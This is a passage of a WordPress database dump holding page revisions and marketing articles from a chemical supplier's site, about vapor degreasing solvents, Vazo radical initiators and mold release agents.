span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1992"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-23 17:13:00', '2016-09-23 17:13:00', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1995, 2, '2016-09-23 17:14:49', '2016-09-23 17:14:49', '', 'vazo-logo', '', 'inherit', 'open', 'closed', '', 'vazo-logo-5', '', '', '2016-09-23 17:14:49', '2016-09-23 17:14:49', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/Vazo-logo-4.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1996, 2, '2016-09-23 17:15:09', '2016-09-23 17:15:09', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n\r\n[/text_box]\r\n[text_box]\r\n\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n\r\n[/text_box]\r\n[text_box position_y="20"]\r\n\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n\r\n<h3>Technical Support</h3>\r\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n<h3>Application Experts</h3>\r\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n<h3>Large Inventory</h3>\r\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-23 17:15:09', '2016-09-23 17:15:09', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1997, 2, '2016-09-23 17:16:32', '2016-09-23 17:16:32', '', 'ms-224-trigger-spray', '', 'inherit', 'open', 'closed', '', 'ms-224-trigger-spray', '', '', '2016-09-23 17:16:32', '2016-09-23 17:16:32', '', 1852, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-224-TRIGGER-SPRAY.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1998, 3, '2016-10-13 17:24:29', '2016-10-13 17:24:29', '<h1><a href="https://www.miller-stephenson.com/product/sion/">Opteon™ Sion</a> - Vapor Degreasing Solvent</h1>\n<h4><strong>What is Vapor Degreasing?</strong></h4>\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities. Opteon™ Sion Vapor Degreasing Solvent is great for removing soils and greases from metal parts.\n<h4><strong>What types of industries use vapor degreasing, and where is it used?</strong></h4>\n<ul>\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\n</ul>\n<h4><strong>What problems do manufacturers face when it comes to vapor degreasing?</strong></h4>\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\n<h4><strong>What is Opteon Sion Specialty Fluid, and why are manufacturers converting to it?</strong></h4>\nOpteon Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide and trichloroethylene across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\n<ul>\n 	<li>Fast drying, increasing productivity</li>\n 	<li>Compatible with most metals, plastics, and elastomers</li>\n 	<li>Nonflammable and low toxicity</li>\n 	<li>Zero ozone depletion potential (ODP)</li>\n 	<li>Low global warming potential (GWP)</li>\n</ul>\n<h4><strong>What specific products can Opteon Sion Specialty Fluid replace?</strong></h4>\n<ul>\n 	<li><a href="https://www.miller-stephenson.com/vertrel-fluids/">n-Propyl Bromide (nPB)</a></li>\n 	<li>Lenium</li>\n 	<li>EnSolv</li>\n 	<li>AK-225</li>\n 	<li>Novec 72DE</li>\n 	<li>Solstice PF</li>\n 	<li>TF-113</li>\n 	<li>Water</li>\n</ul>\n[ux_product_categories ids="231" number="10"]\n\n<a href="https://www.miller-stephenson.com/product/sion/">Click here to learn more about Opteon Sion. </a>\n\nOpteon™ is  a trademark of The Chemours Company FC, LLC.', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-autosave-v1', '', '', '2016-10-13 17:24:29', '2016-10-13 17:24:29', '', 1135, 'https://www.miller-stephenson.com/1135-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1999, 3, '2016-09-23 18:48:42', '2016-09-23 18:48:42', '<strong>What is vapor degreasing?</strong>\r\n\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities.\r\n\r\n<strong>What types of industries use vapor degreasing, and where is it used?</strong>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<strong>What problems do manufacturers face when it comes to vapor degreasing?</strong>\r\n\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n\r\n<strong>What is Opteon™ Sion Specialty Fluid, and why are manufacturers converting to it?</strong>\r\n\r\nOpteon™ Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<strong>What specific products can Opteon™ Sion Specialty Fluid replace?</strong>\r\n<ul>\r\n 	<li>n-Propyl Bromide (nPB)</li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-09-23 18:48:42', '2016-09-23 18:48:42', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2000, 3, '2016-09-23 18:50:01', '2016-09-23 18:50:01', '<strong>What is Vapor Degreasing?</strong>\r\n\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities.\r\n\r\n<strong>What types of industries use vapor degreasing, and where is it used?</strong>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<strong>What problems do manufacturers face when it comes to vapor degreasing?</strong>\r\n\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n\r\n<strong>What is Opteon™ Sion Specialty Fluid, and why are manufacturers converting to it?</strong>\r\n\r\nOpteon™ Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<strong>What specific products can Opteon™ Sion Specialty Fluid replace?</strong>\r\n<ul>\r\n 	<li>n-Propyl Bromide (nPB)</li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-09-23 18:50:01', '2016-09-23 18:50:01', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2001, 2, '2016-09-23 18:54:36', '2016-09-23 18:54:36', '', 'Vapor Degreasing Solvent', '', 'inherit', 'open', 'closed', '', 'vapor-degreaser', '', '', '2016-10-12 20:16:04', '2016-10-12 20:16:04', '', 1135, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/Vapor-Degreaser.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2002, 2, '2016-09-23 18:55:31', '2016-09-23 18:55:31', '', 'vapor-degreaser', '', 'inherit', 'open', 'closed', '', 'vapor-degreaser-2', '', '', '2016-09-23 18:55:31', '2016-09-23 18:55:31', '', 1121, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/Vapor-Degreaser-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2003, 2, '2016-09-23 18:55:38', '2016-09-23 18:55:38', 'Recently, the National Toxicity Program issued a report, dated August 2011, “Toxicology and Carcinogenesis Studies of 1-Bromopropane in F344/N Rats and B6C3F1 Mice (Inhalation studies).” https://ntp.niehs.nih.gov/ntp/htdocs/LT_rpts/TR564.pdf\r\n\r\nThe report concluded that there was “clear evidence of carcinogenic activity” in female mice and rats. As a result of this finding, Cal/OSHA has set an 8-hour worker permissible exposure limit (PEL) of 5 ppm. In addition, the American Conference of Governmental Industrial Hygienist (ACGIH) in 2011 has proposed a TLV of 0.1 ppm. Vertrel specialty fluids can replace nPB, providing the cleaning efficacy needed while addressing safety and health concerns. Here are five reasons Vertrel is an excellent replacement for nPB:\r\n<ol>\r\n 	<li><strong>Exposure Limit:</strong> Vertrel specialty fluids have exposure limits around 200 ppm. By comparison, Isopropyl alcohol (rubbing alcohol) has an exposure limit of 200 ppm. The exposure limit of nPB exposure limit is measured between 5 ppm – 10 ppm by varying standards organizations.</li>\r\n 	<li> <strong>Cleaning Performance:</strong> Vertrel specialty fluids have the broadest range of cleaning power of any solvent family. KB values (a measure of cleaning power) range from 11 to a high of 110. Vertrel can match nPB’s cleaning power.</li>\r\n 	<li><strong>Solvent Maintenance:</strong> Vertrel specialty fluids are inherently stable and do not need acid acceptance testing or stabilizer maintenance unlike nPB. In addition, the relatively high exposure limit of Vertrel enables the use of open top vapor degreasers, and solvent air monitoring can be kept to a minimum.</li>\r\n 	<li><strong>Solvent Usage:</strong> Today’s cleaning equipment manufacturers have improved system design resulting in significant reductions in the amount of solvent emissions and reducing overall operating costs. Vertrel is cost competitive with nPB as a result of the emissions reduction.</li>\r\n 	<li><strong>Global Acceptance:</strong> Vertrel specialty fluids are globally accepted as a safe cleaning material. Many countries have classified nPB as a reproductive toxin. In Europe, nPB is labeled as R60 (may impair fertility); R63 (possible risk of harm to the unborn child); and R48/20 (harmful: danger of serious damage to health by prolonged exposure through inhalation).</li>\r\n</ol>\r\n<strong>Summary</strong>\r\n\r\nVertrel specialty fluids have similar solvency strength as nPB. Vertrel is non-flammable, safe, and requires no stabilizers, making Vertrel an ideal replacement for nPB.\r\n\r\n<img src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/Vapor-Degreaser-1.jpg" alt="vapor-degreaser" width="680" height="498" class="alignnone size-full wp-image-2002" />\r\n', 'Why Vertrel specialty fluids are a suitable replacement for nPB', '', 'inherit', 'closed', 'closed', '', '1121-revision-v1', '', '', '2016-09-23 18:55:38', '2016-09-23 18:55:38', '', 1121, 'https://www.miller-stephenson.com/1121-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2004, 3, '2016-09-24 13:55:18', '2016-09-24 13:55:18', 'Vazo FRS is a Miller-Stephenson exclusive product line of diazo-compounds designed to be used as radical initiators for a variety of polymerization, halogenations, addition, and crosslinking reactions.  Diazo-compounds decompose via photolysis or thermally to yield two free radicals per molecule and one equivalent of nitrogen gas.\r\n\r\n[caption id="attachment_1602" align="aligncenter" width="604"]<img class="wp-image-1602" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/Initiation_-_photolysis-800x114.png" alt="initiation_-_photolysis" width="604" height="86" /> Diagram 1: Photolysis of VAZO 64 (AIBN)[/caption]\r\n\r\nThe thermal decomposition temperature at which diazo-compounds will begin this process is dictated by the aliphatic chain and stability of the resultant nitrile-radical. Vazo compounds which have a low thermal decomposition temperature will be more reactive and generate more free radicals at a given temperature than a variant with a higher thermal decomposition threshold.  For the Vazo compounds, Vazo 64 (AIBN) has a 10hr half-life at 64 degrees Celsius, while Vazo 88 has a 10hr half-life at 88 degrees Celsius and so on.  To ease our customers to distinguish which Vazo variant will work for their synthetic pathway, the number associated each Vazo analogue indicates its 10hr half-life at that temperature.\r\n\r\nAnother widely used radical initiator are peroxides.  Peroxides can come as liquid or solid, depending on their chemical structure and, like diazo-compounds, will undergo thermal or light-induced decomposition to generate free radicals.  Peroxides are widely used for a variety of polymerization reactions, however they also have significant chemical and safety drawbacks, in comparison to Vazo FRS. Peroxides are extremely shock sensitive and can detonate on impact, they also can induce free radical decomposition, and are extremely temperature sensitive.  In comparison to the equivalent peroxide (based on similar half-lives) initiator, Vazo does not exhibit any of these dangerous safety concerns.  From a synthetic perspective, peroxides facilitate higher polydispersion, increased crosslinking and branching, higher viscosity, increased by-product formation, lower control on monomer distribution and high oxidation potential versus the equivalent Vazo initiator.  Moreover peroxides are extremely sensitive to heavy metal contamination, pH variation, additives, and solvent choice.  Vazo initiators experience non of these drawbacks, and maintains predictable reactivity independent of solvent choice, pH, contamination, and pigments.  Also, unlike peroxides, Vazo initiators are only mild oxidizing so polymerizations with oxidation-susceptible functionality can be performed.\r\n\r\nOf interest to any chemical engineer is the cost effectiveness of each reagent chosen for their process. In addition to polymerization control benefits, many Vazo FRS grades have low molecular weights.  On a cost per mol (e.g. cost per pound) basis, Vazo FRS are frequently <b>more </b><b>cost effective </b>than conventional organic peroxides.  Moreover Vazo variants come as safer, low-dust "noodle" forms. Vazo noodles present <b>minimal risk of dust blow back </b>during product addition, and are <b>easier </b><b>to handle </b>than typical granular products.\r\n\r\nFrom a reactivity, efficiency, cost-effectiveness, and most importantly safety aspect Vazo FRS is a clear improvement to any chemical process currently using peroxide-based initiators or engineers looking to use a safer and higher purity diazo-compound.', 'Vazo Free Radical Initiator: Benefits and Uses', '', 'inherit', 'closed', 'closed', '', '1601-revision-v1', '', '', '2016-09-24 13:55:18', '2016-09-24 13:55:18', '', 1601, 'https://www.miller-stephenson.com/1601-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2005, 3, '2016-09-24 13:55:48', '2016-09-24 13:55:48', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agent systems: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent systems.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<strong>PTFE Release Agents</strong>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE-based release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on an release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release systems are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-09-24 13:55:48', '2016-09-24 13:55:48', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2006, 3, '2016-09-24 15:04:56', '2016-09-24 15:04:56', 'Miller-Stephenson offers a broad range of specialty products to help provides our customers with the solutions they require. Freeze agents for hot/cold intermittence testing of electronic components or reducing tack in prepreg composities. Environmentally-Friendly and Non-flammable Dusters to remove microscopic dust and debris. These are just examples of the extensive portfolio of solutions we offer to meet your needs.\n\nVertrel, Sion™, and Miller-Stephenson SolvSys specialty high-purity fluids and solvents offer robust cleaning agents and carriers to meet your most stringent specifications.  Excellent compatibility with most plastics and rubbers, non-flammable, and high cleaning efficiency are just some of the unique characteristics our fluids and solvents can offer you.\n\n[product_categories number="2" ids="10,94" columns="4" title="Specialty Products &amp; Solvents"]', 'Specialty Products & Solvents', '', 'inherit', 'closed', 'closed', '', '1871-autosave-v1', '', '', '2016-09-24 15:04:56', '2016-09-24 15:04:56', '', 1871, 'https://www.miller-stephenson.com/1871-autosave-v1/', 0, 'revision', '', 0); 
